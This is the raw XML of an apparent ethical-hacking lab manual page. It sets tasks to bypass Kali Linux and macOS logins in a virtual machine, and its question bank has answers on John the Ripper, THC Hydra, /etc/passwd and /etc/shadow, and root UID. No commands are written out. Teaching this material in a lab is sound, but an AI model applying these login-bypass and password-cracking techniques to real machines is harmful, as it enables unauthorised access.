          <w:p w14:paraId="06361D93"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7F9F950C" w14:textId="77777777" w:rsidR="004436DE" w:rsidRPr="001C411D" w:rsidRDefault="004436DE" w:rsidP="004436DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004436DE" w:rsidRPr="001C411D" w14:paraId="1CEA4FC2" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23CA2496" w14:textId="155F1FA3"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4436DE" w:rsidRPr="001C411D" w14:paraId="3AB9BE10" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D4D70E0"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488BEAC1" w14:textId="77777777" w:rsidR="004436DE" w:rsidRPr="001C411D" w:rsidRDefault="004436DE" w:rsidP="004436DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004436DE" w:rsidRPr="001C411D" w14:paraId="3F04C332" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EF03837"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2AC7689B" w14:textId="77777777" w:rsidR="004436DE" w:rsidRPr="001C411D" w:rsidRDefault="004436DE" w:rsidP="004436DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34C13A8B" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00841062">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41062" w:rsidRPr="001C411D" w14:paraId="4231DE6A" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73EFB71E"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4E50E4D2"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p w14:paraId="10672DED" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062"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Bypass the Login of Linux and MAC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61598435"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tc>
      </w:tr>
      <w:tr w:rsidR="00841062" w:rsidRPr="001C411D" w14:paraId="5F08BD1E" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0E2E5756"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22D93504" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01D3ABD4" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="0084106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Bypass the login details of target in active and passive mode on all type of operating system</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3073A188"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0C4E8CFF" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D4C0927"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19081488" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66086684" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Perform Kali Linux Login Bypass in virtual machine</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B51D03C" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Perform MAC Login Bypass in virtual machine</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CAE786C" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00841062" w:rsidRPr="001C411D" w14:paraId="202F3994" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C83CA3C"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26F23119" w14:textId="77777777" w:rsidR="00841062" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57E369C0" w14:textId="77777777" w:rsidR="00E14EE3" w:rsidRPr="001C411D" w:rsidRDefault="00E14EE3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="345242A2" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Bypassing Login of Kali Linux and MAC:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52D2FD51" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="034CFCAC" w14:textId="77777777" w:rsidR="00841062" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EC29F61" wp14:editId="2B6915BF">
                  <wp:extent cx="5926455" cy="2975610"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2" name="Picture 2" descr="forgot kali linux password">
                    <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94C6E905-4785-405B-A99C-64B245FD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got kali linux password">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94C6E905-4785-405B-A99C-64B245FD4A3A}"/>
                              </a:ext>
                            </a:extLs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26455" cy="2975610"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CEDD2C9" w14:textId="77777777" w:rsidR="000C6497" w:rsidRDefault="000C6497" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A7812BA" w14:textId="77777777" w:rsidR="00E14EE3" w:rsidRDefault="00E14EE3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4EF1368C" w14:textId="77777777" w:rsidR="000C6497" w:rsidRPr="001C411D" w:rsidRDefault="000C6497" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B8609B5"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5BEC9951" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EC09E8F"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lastRenderedPageBreak/>
              <w:t>Question Bank:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E8FABD7" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78C0336A" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="00A92F8A" w:rsidRDefault="00841062" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>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rite a short note on </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">John the Ripper </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>tool.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="281CE985" w14:textId="77777777" w:rsidR="00A92F8A" w:rsidRPr="00A92F8A" w:rsidRDefault="00A92F8A" w:rsidP="00A92F8A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A92F8A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>John the Ripper is a popular open-source password cracking tool that is used to find weak passwords. It can crack passwords by using dictionary attacks, brute force attacks, and hybrid attacks. The tool supports many different password hash types and can run on a variety of operating systems, including LINUX. John the Ripper is often used by security professionals to test the strength of their organization's passwords.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AA896FD" w14:textId="77777777" w:rsidR="00A92F8A" w:rsidRPr="001C411D" w:rsidRDefault="00A92F8A" w:rsidP="00A92F8A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="00816153" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>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Can </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">THC Hydra </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>tool be used for cracking LINUX machine password?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="262E2769" w14:textId="77777777" w:rsidR="00A92F8A" w:rsidRPr="00A92F8A" w:rsidRDefault="00A92F8A" w:rsidP="00A92F8A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A92F8A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Yes, THC Hydra is a popular network login cracking tool that can be used to crack LINUX machine passwords. It is a command-line tool that supports a variety of network protocols, including SSH, Telnet, and FTP. THC Hydra can use a variety of different attack methods, including brute force and dictionary attacks, to crack passwords.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E232ACE" w14:textId="77777777" w:rsidR="00A92F8A" w:rsidRDefault="00A92F8A" w:rsidP="00A92F8A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E7F4B58" w14:textId="50022A72" w:rsidR="00841062" w:rsidRDefault="00841062" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>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ich file allows the hacker to see user information such as full name, phone number etc. in LINUX?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55B32398" w14:textId="77777777" w:rsidR="00A92F8A" w:rsidRPr="00A92F8A" w:rsidRDefault="00A92F8A" w:rsidP="00A92F8A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="546952E3" w14:textId="77777777" w:rsidR="00A92F8A" w:rsidRPr="00A92F8A" w:rsidRDefault="00A92F8A" w:rsidP="00A92F8A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A92F8A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>In LINUX, the file that contains user information such as full name, phone number, and other personal details is the "/etc/passwd" file. This file contains a list of all the users on the system and their associated information. However, this file does not contain passwords, as passwords are stored in a separate file called "/etc/shadow".</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12FED80D" w14:textId="77777777" w:rsidR="00A92F8A" w:rsidRPr="001C411D" w:rsidRDefault="00A92F8A" w:rsidP="00A92F8A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="747A76E3" w14:textId="77777777" w:rsidR="00841062" w:rsidRDefault="00841062" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>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ich permission value in LINUX allows to read and execute?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A03A841" w14:textId="77777777" w:rsidR="00A92F8A" w:rsidRPr="00A92F8A" w:rsidRDefault="00A92F8A" w:rsidP="00A92F8A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A92F8A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>The permission value in LINUX that allows a user to read and execute a file or directory is "5". This permission value is represented by the digit "5" in the permission string. In the permission string, the first digit represents the owner's permissions, the second digit represents the group's permissions, and the third digit represents the permissions for others. The number "4" represents read permission, the number "2" represents write permission, and the number "1" represents execute permission. Therefore, the number "5" represents read and execute permission.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4481FE40" w14:textId="77777777" w:rsidR="00A92F8A" w:rsidRPr="001C411D" w:rsidRDefault="00A92F8A" w:rsidP="00A92F8A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5C2A9BE0" w14:textId="059FE76C" w:rsidR="00A92F8A" w:rsidRPr="00A92F8A" w:rsidRDefault="00841062" w:rsidP="00A92F8A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>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at is the UID of root user in LINUX?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="192FDAE1" w14:textId="69AAD2F0" w:rsidR="00A92F8A" w:rsidRPr="00A92F8A" w:rsidRDefault="00A92F8A" w:rsidP="00A92F8A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A92F8A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>The UID (user ID) of the root user in LINUX is "0". The root user is a superuser who has full control over the system and can perform any action on the system. The root user is often used for system administration tasks and should be used with caution, as any mistakes or errors made by the root user can have serious consequences.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13595D52" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00841062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
